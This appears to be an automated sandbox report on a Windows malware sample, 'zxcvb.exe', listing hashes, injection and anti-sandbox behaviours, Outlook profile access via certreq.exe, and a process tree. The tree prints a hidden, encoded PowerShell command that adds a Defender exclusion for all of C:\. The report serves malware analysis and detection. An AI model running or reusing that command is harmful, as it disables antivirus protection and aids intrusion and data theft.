Analysis
-
max time kernel
152s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
30/06/2023, 12:48
Static task
static1
Behavioral task
behavioral1
Sample
zxcvb.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
zxcvb.exe
Resource
win10v2004-20230621-en
General
-
Target
zxcvb.exe
-
Size
2.0MB
-
MD5
69773ff9cddbe895d0c1a7c381e15d81
-
SHA1
15a2796b6b77bd1f03eb0a30cfeb7e3c2f0a0631
-
SHA256
fc6ddb1f7644597b84d14e3efa4cd1a1d1ad0083141b3fa2a613cd3c092f6505
-
SHA512
550f9e02a7f1a1dc3734ba0d86940c2b298cee5890801aeba4f738bb306cdc717a6ecad34e2ebd2c3ac1b0151f2acae7131388f999a30ab9b914c3707a35544e
-
SSDEEP
49152:NZVlrVqLTyYBYTKiJHZ+guvLN09WIfw8eZrjwMmPK:7hIGKiJk7LN09WKOdMMmy
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4760 created 3176 4760 zxcvb.exe 53 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation zxcvb.exe -
Executes dropped EXE 4 IoCs
pid Process 3048 BLIrlccnw.exe 1772 BLIrlccnw.exe 4312 CanReuseTransform.exe 4556 CanReuseTransform.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook certreq.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 992 set thread context of 4760 992 zxcvb.exe 94 PID 3048 set thread context of 1772 3048 BLIrlccnw.exe 96 PID 4312 set thread context of 4556 4312 CanReuseTransform.exe 108 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 certreq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString certreq.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4760 zxcvb.exe 4760 zxcvb.exe 4760 zxcvb.exe 4760 zxcvb.exe 2216 certreq.exe 2216 certreq.exe 4044 powershell.exe 4044 powershell.exe 2216 certreq.exe 2216 certreq.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 992 zxcvb.exe Token: SeDebugPrivilege 3048 BLIrlccnw.exe Token: SeDebugPrivilege 1772 BLIrlccnw.exe Token: SeDebugPrivilege 4044 powershell.exe Token: SeDebugPrivilege 4312 CanReuseTransform.exe Token: SeDebugPrivilege 4556 CanReuseTransform.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 992 wrote to memory of 3048 992 zxcvb.exe 93 PID 992 wrote to memory of 3048 992 zxcvb.exe 93 PID 992 wrote to memory of 3048 992 zxcvb.exe 93 PID 992 wrote to memory of 4760 992 zxcvb.exe 94 PID 992 wrote to memory of 4760 992 zxcvb.exe 94 PID 992 wrote to memory of 4760 992 zxcvb.exe 94 PID 992 wrote to memory of 4760 992 zxcvb.exe 94 PID 992 wrote to memory of 4760 992 zxcvb.exe 94 PID 992 wrote to memory of 4760 992 zxcvb.exe 94 PID 992 wrote to memory of 4760 992 zxcvb.exe 94 PID 992 wrote to memory of 4760 992 zxcvb.exe 94 PID 992 wrote to memory of 4760 992 zxcvb.exe 94 PID 3048 wrote to memory of 1772 3048 BLIrlccnw.exe 96 PID 3048 wrote to memory of 1772 3048 BLIrlccnw.exe 96 PID 3048 wrote to memory of 1772 3048 BLIrlccnw.exe 96 PID 3048 wrote to memory of 1772 3048 BLIrlccnw.exe 96 PID 3048 wrote to memory of 1772 3048 BLIrlccnw.exe 96 PID 3048 wrote to memory of 1772 3048 BLIrlccnw.exe 96 PID 3048 wrote to memory of 1772 3048 BLIrlccnw.exe 96 PID 3048 wrote to memory of 1772 3048 BLIrlccnw.exe 96 PID 4760 wrote to memory of 2216 4760 zxcvb.exe 97 PID 4760 wrote to memory of 2216 4760 zxcvb.exe 97 PID 4760 wrote to memory of 2216 4760 zxcvb.exe 97 PID 4760 wrote to memory of 2216 4760 zxcvb.exe 97 PID 4312 wrote to memory of 4556 4312 CanReuseTransform.exe 108 PID 4312 wrote to memory of 4556 4312 CanReuseTransform.exe 108 PID 4312 wrote to memory of 4556 4312 CanReuseTransform.exe 108 PID 4312 wrote to memory of 4556 4312 CanReuseTransform.exe 108 PID 4312 wrote to memory of 4556 4312 CanReuseTransform.exe 108 PID 4312 wrote to memory of 4556 4312 CanReuseTransform.exe 108 PID 4312 wrote to memory of 4556 4312 CanReuseTransform.exe 108 PID 4312 wrote to memory of 4556 4312 CanReuseTransform.exe 108 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook certreq.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook certreq.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3176
-
C:\Users\Admin\AppData\Local\Temp\zxcvb.exe"C:\Users\Admin\AppData\Local\Temp\zxcvb.exe"2⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Users\Admin\AppData\Local\Temp\BLIrlccnw.exe"C:\Users\Admin\AppData\Local\Temp\BLIrlccnw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Users\Admin\AppData\Local\Temp\BLIrlccnw.exeC:\Users\Admin\AppData\Local\Temp\BLIrlccnw.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
-
C:\Users\Admin\AppData\Local\Temp\zxcvb.exeC:\Users\Admin\AppData\Local\Temp\zxcvb.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4760
-
-
-
C:\Windows\system32\certreq.exe"C:\Windows\system32\certreq.exe"2⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:2216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4044
-
C:\Users\Admin\AppData\Local\EventProvider\crctqful\CanReuseTransform.exeC:\Users\Admin\AppData\Local\EventProvider\crctqful\CanReuseTransform.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Users\Admin\AppData\Local\EventProvider\crctqful\CanReuseTransform.exeC:\Users\Admin\AppData\Local\EventProvider\crctqful\CanReuseTransform.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5fc6f64c6b52d80c505cc7d6f04d0952e
SHA11c472c2ceb83bfcd5adc6770e35594a5b0ec5390
SHA256c2061f2b7856cda556570a83ba325c684a2a72fed77eb322ae661714a77c9040
SHA512cc0a6d32eeafd0238510cf327d8f71cc94f4ee5997389071c7431ee06446f88ecfe9fe8f7c5adbe88ea3c889d066dd7a862bd4eda2301dc129f8f4c4174f9e9c
-
Filesize
1.2MB
MD5fc6f64c6b52d80c505cc7d6f04d0952e
SHA11c472c2ceb83bfcd5adc6770e35594a5b0ec5390
SHA256c2061f2b7856cda556570a83ba325c684a2a72fed77eb322ae661714a77c9040
SHA512cc0a6d32eeafd0238510cf327d8f71cc94f4ee5997389071c7431ee06446f88ecfe9fe8f7c5adbe88ea3c889d066dd7a862bd4eda2301dc129f8f4c4174f9e9c
-
Filesize
1.2MB
MD5fc6f64c6b52d80c505cc7d6f04d0952e
SHA11c472c2ceb83bfcd5adc6770e35594a5b0ec5390
SHA256c2061f2b7856cda556570a83ba325c684a2a72fed77eb322ae661714a77c9040
SHA512cc0a6d32eeafd0238510cf327d8f71cc94f4ee5997389071c7431ee06446f88ecfe9fe8f7c5adbe88ea3c889d066dd7a862bd4eda2301dc129f8f4c4174f9e9c
-
Filesize
1016B
MD59150c8f2f2f60368a855cffc9a0fcbb9
SHA19853f7510a5cf97309ca7af5143b89524951f18b
SHA256863bc8477754f103fb8917734952698cfd8c718c6286a4a093cda340e1248c57
SHA512caf0399e9162372dbd6121ac312bdf532248be03fcf59cb798e61d1cbdc2468835f0ea68a56d81c95673713c503743cc1defbf3f06f4cee5e65a2f280aaa6228
-
Filesize
1016B
MD59150c8f2f2f60368a855cffc9a0fcbb9
SHA19853f7510a5cf97309ca7af5143b89524951f18b
SHA256863bc8477754f103fb8917734952698cfd8c718c6286a4a093cda340e1248c57
SHA512caf0399e9162372dbd6121ac312bdf532248be03fcf59cb798e61d1cbdc2468835f0ea68a56d81c95673713c503743cc1defbf3f06f4cee5e65a2f280aaa6228
-
Filesize
1.2MB
MD5fc6f64c6b52d80c505cc7d6f04d0952e
SHA11c472c2ceb83bfcd5adc6770e35594a5b0ec5390
SHA256c2061f2b7856cda556570a83ba325c684a2a72fed77eb322ae661714a77c9040
SHA512cc0a6d32eeafd0238510cf327d8f71cc94f4ee5997389071c7431ee06446f88ecfe9fe8f7c5adbe88ea3c889d066dd7a862bd4eda2301dc129f8f4c4174f9e9c
-
Filesize
1.2MB
MD5fc6f64c6b52d80c505cc7d6f04d0952e
SHA11c472c2ceb83bfcd5adc6770e35594a5b0ec5390
SHA256c2061f2b7856cda556570a83ba325c684a2a72fed77eb322ae661714a77c9040
SHA512cc0a6d32eeafd0238510cf327d8f71cc94f4ee5997389071c7431ee06446f88ecfe9fe8f7c5adbe88ea3c889d066dd7a862bd4eda2301dc129f8f4c4174f9e9c
-
Filesize
1.2MB
MD5fc6f64c6b52d80c505cc7d6f04d0952e
SHA11c472c2ceb83bfcd5adc6770e35594a5b0ec5390
SHA256c2061f2b7856cda556570a83ba325c684a2a72fed77eb322ae661714a77c9040
SHA512cc0a6d32eeafd0238510cf327d8f71cc94f4ee5997389071c7431ee06446f88ecfe9fe8f7c5adbe88ea3c889d066dd7a862bd4eda2301dc129f8f4c4174f9e9c
-
Filesize
1.2MB
MD5fc6f64c6b52d80c505cc7d6f04d0952e
SHA11c472c2ceb83bfcd5adc6770e35594a5b0ec5390
SHA256c2061f2b7856cda556570a83ba325c684a2a72fed77eb322ae661714a77c9040
SHA512cc0a6d32eeafd0238510cf327d8f71cc94f4ee5997389071c7431ee06446f88ecfe9fe8f7c5adbe88ea3c889d066dd7a862bd4eda2301dc129f8f4c4174f9e9c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82